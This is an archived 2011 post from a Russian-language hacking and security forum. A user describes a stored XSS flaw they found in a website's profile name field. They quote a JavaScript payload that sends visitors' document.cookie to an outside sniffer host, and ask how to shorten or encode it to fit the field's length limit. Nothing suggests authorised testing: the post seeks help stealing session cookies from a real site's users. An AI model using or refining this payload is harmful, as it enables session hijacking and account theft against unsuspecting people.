XSS Слишком длинный.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

29.11.2011, 12:54

Groove

Guest

Сообщений: n/a

Провел на форуме:
59158

Репутация: 2

Всем привет , у меня такой необычный вопрос , на одном сайте я нашел

Цитата:

Сообщение от None

xss

уязвимость , допустим я вставляю

Цитата:

Сообщение от None

">alert('xss')

в поля (Имя)

Все проходит успешно и при заходе на данный профиль мне пишет что уязвимость есть , теперь я хочу вставить следующий скрипт

Цитата:

Сообщение от None

[COLOR="Red"]img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;

Но дело в том что при вставки данного xss в этом поле она не сохраняется , а причина тому слишком много символов , как я выяснил .

Собственно вопрос : Как можно сделать короче (сократить, уменьшить )

Цитата:

Сообщение от None

img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1010.gif?"+document.cookie;

или зашифровать , но чтобы смысл данного скрипта оставался одним и тем же?

Спасибо за внимание .